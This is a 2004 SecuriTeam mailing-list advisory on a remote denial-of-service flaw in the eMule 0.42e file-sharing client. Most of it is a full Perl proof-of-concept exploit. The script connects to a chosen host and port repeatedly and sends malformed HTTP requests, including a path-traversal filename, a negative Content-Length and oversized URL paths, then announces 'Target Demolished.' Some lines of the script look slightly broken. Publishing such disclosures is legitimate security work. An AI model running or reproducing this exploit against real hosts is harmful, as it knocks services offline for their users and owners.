[NT] eMule Remote DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/04

  • Next message: SecuriTeam: "[TOOL] Gwee (Generic Web Exploitation Engine)"
    To: list@securiteam.com
    Date: 11 May 2004 15:59:41 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      eMule Remote DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.emule-project.net/index.php?s=home> eMule is "a new file
    sharing client which is based on the eDonkey2000 network, but offers more
    features than the standard eDonkey client, because it's open source but
    under the restrictions of the GPL License."

    A remote DoS vulnerability exists in eMule. Presented is a
    proof-of-concept exploit code in Perl for this vulnerability.

    DETAILS

    Vulnerable Systems:
     * eMule version 0.42e

    Exploit:
    #!/usr/bin/perl

    system("cls");
    # Emule 0.42e Remote Denial Of Service Exploit
    # Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com
    # usage: perl emule042e.pl <host> <port> <how many times>

    use IO::Socket;
    my $host = $ARGV[0];
    my $port = $ARGV[1];
    my $times = $ARGV[2];

    if ($host)
    {
    unless($port) { $port="4711";}
    unless($times) { $times="50";}
    {
            print "Emule 0.42e Remote Denial Of Service Exploit
          Coded by The-Insider\n\n";
            print "[+] Connecting to target $host:$port\n";
    for $i (1..$times) {
            $remote=IO::Socket::INET->new(Proto =>"tcp",
     PeerAddr => $host,
     PeerPort => 80,
                      Type => SOCK_STREAM
                      Timeout => 8);

     unless ($remote)
             {
             die "can't connect to $host"
             }
             print "[+] Connected to target $host:$port\n";
             print "[+] Sending Request\n";
     $remote ->autoflush(1);
    print $remote "GET / HTTP/1.1
    Content-Disposition: form-data; name=\"file\";
    filename=\"../../../file.txt\"

    ";
    print $remote "POST / HTTP/1.0
    Content-Length: 10

    123456789

    ";
    print $remote "POST / HTTP/1.1
    Content-Length: -1

    ";
    print $remote "GET /%%%%%%%%%%%% HTTP/1.0

    ";
    print $remote "index.htm

    ";
    print $remote "GET
    /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

    ";
    print $remote "GET
    /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaa

    ";
    print $remote "GET c:\

    ";
             print $remote "GET
    /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

    ";
             while(<$remote>)
             {
             $cool .= $_;
     if ($cool =~ /Server:/i)
             {
             close $cool;
             -close $remote;
             }
             }
             print "[+] Target Demolished.\n";
    }}}
    else
    {
    die "\nEmule 0.42e Remote Denial Of Service Exploit
    Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com

    usage: perl emule042e.pl <host> <port> <how many times>\n\n";
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:theinsider@012.net.il> Rafel
    Ivgi, The-Insider.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[TOOL] Gwee (Generic Web Exploitation Engine)"

    Relevant Pages

    • [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
      (Securiteam)
    • [NEWS] Arkeia Network Backup Client Allows Unauthenticated Remote Access to Computer
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Arkeia Network Backup Client allows a remote ... my $class = shift; ... sub Check { ...
      (Securiteam)
    • [NT] COOL! Remote Control DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... excellent remote computing system that is very easy to use. ... Remote Control 1.12 ... Control (server) component that could allow a remote attacker to crash the ...
      (Securiteam)
    • [NEWS] Apple QuickTime Multiple Vulnerabilities (PICT, Integer Overflow, DoS)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerabilities have been discovered in Apple's QuickTime. ... PICT Remote Memory Overwrite: ... Apple QuickTime PictureViewer is reported prone to remote memory overwrite ...
      (Securiteam)
    • [NEWS] Adobe SVG Viewer Local and Remote File Reading
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... "Adobe SVG Viewer 3.0 is available in 15 languages and many ... A vulnerability in Adobe's SVG allows remote attackers to read locally ...
      (Securiteam)